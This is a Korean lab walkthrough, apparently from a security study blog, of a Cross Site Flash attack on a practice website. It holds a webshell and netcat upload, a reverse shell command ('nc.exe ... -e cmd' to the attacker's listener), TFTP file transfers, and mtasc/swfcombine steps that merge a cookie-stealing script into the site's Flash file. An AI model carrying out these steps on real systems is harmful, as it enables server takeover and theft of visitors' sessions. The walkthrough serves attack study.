[Web Security & Hacking] XSF(Cross Site Flash) 공격

네트워크 구성

 

-   XSS 공격의 한 종류로 Flash 파일을 사용한다는 특징이 있다.

 

공격 방법

1. 외부 공격자 (XP)가 Camel 사이트의 메인 페이지의 Flash 파일을 다운로드 받는다.

2. 악의적인 목적의 Action Script가 숨어있는 Flash 파일을 생성 후 위에서 다운로드받은 Camel 사이트의 Flash파일과 합쳐서 새로운 Flash 파일을 생성한다.

3. 위에서 생성한 가짜 Flash 파일을 Web서버의 메인 페이지에 업로드하여 다른 사용자들이 해당 Flash파일을 보는 순간 4. Script가 실행되도록 유도한다.

 

-   소스보기를 통해서 Flash파일(.swf)가 있는지 확인한다.

 

 

-   main_flash.swf파일을 경로 뒤에 붙여 넣어서 어떤 Flash 파일인지 확인한다.

 

 

-   메인 페이지의 Flash 파일과 일치하는것을 확인할 수 있다.

 

 

1.  nc.exe, webshell.asp 파일 업로드

-   공격자가 Camel 사이트에 첨부 파일을 업로드 할 수 있는 게시판에 글을 작성하여 nc.exe와 webshell.asp파일을 업로드한다.

 

 

 

 

2. Attacker PC에서 Web Server CMD 접속

-    Upload 된 Webshell과 Netcat으로 리버스 쉘 기능을 사용하여 공격자(XP)에게 Web 서버의 CMD 권한을 획득하도록 한다.

-   UTM 장치에서 22번 포트(SSH) 허용.(다른 포트 사용 가능)

 

-   Attacker의 CMD 창에서 nc -lvp 22 명령어를 입력한다.

 

 

-   Attacker PC에서 ebShell을 통해 nc의 Upload경로로 이동한다. (dir c:\inetpub\camel\board\upload)

 

 

-   WebShell을 통해 c:\inetpub\camel\board\upload\nc.exe 192.168.1.1 22 -e cmd 명령어를 입력하여 Attacker PC에서 Web_Server의 CMD로 접근하는것을 가능하게 한다.

-   CMD창을 확인해보면 정상적으로 웹 서버의 CMD에 접근한것을 확인할 수 있다.

 

3. Attacker PC에서 TFTP를 통해 main_flash.swf 파일 다운로드

-   UTM장비에서 TFTP 포트를 허용해 준다.

 

 

 

-   TFTP를 통해 main_flash.swf파일을 다운로드한다.

tftp -i 192.168.1.2 put main_flash.swf

 

 

4. Action Script 파일 

-   Attacker PC에 Action Script파일과 dump, combine파일을 넣는다.

 

 

-   swfdump를 통해 flash파일의 크기를 확인한다.

swfdump --width --height --rate main_flash.swf

 

-   mtasc를 활용하여 sendcookie.as 파일을 삽입한 swfdump를 통해 알아온 동일한 크기의 flash파일을 생성한다.

mtasc -swf sendcookie.swf -header 367:185:20 sendcookie.as

 

-   swfcombine을 통해서 기존 main flash파일과 script를 삽입한 sendcookie.swf파일을 합친다.

swfcombine -o main_flash2.swf -T sendcookie.swf main_flash.swf

 

 

-   TFTP를 통해서 Web Server에 업로드한다.

tftp -i 192.168.1.2 get main_flash2.swf main_flash.swf

 

 

-   다시 Attacker PC에서 사이트에 접속하면 겉으로 보기에는 달라진 모습이 없다.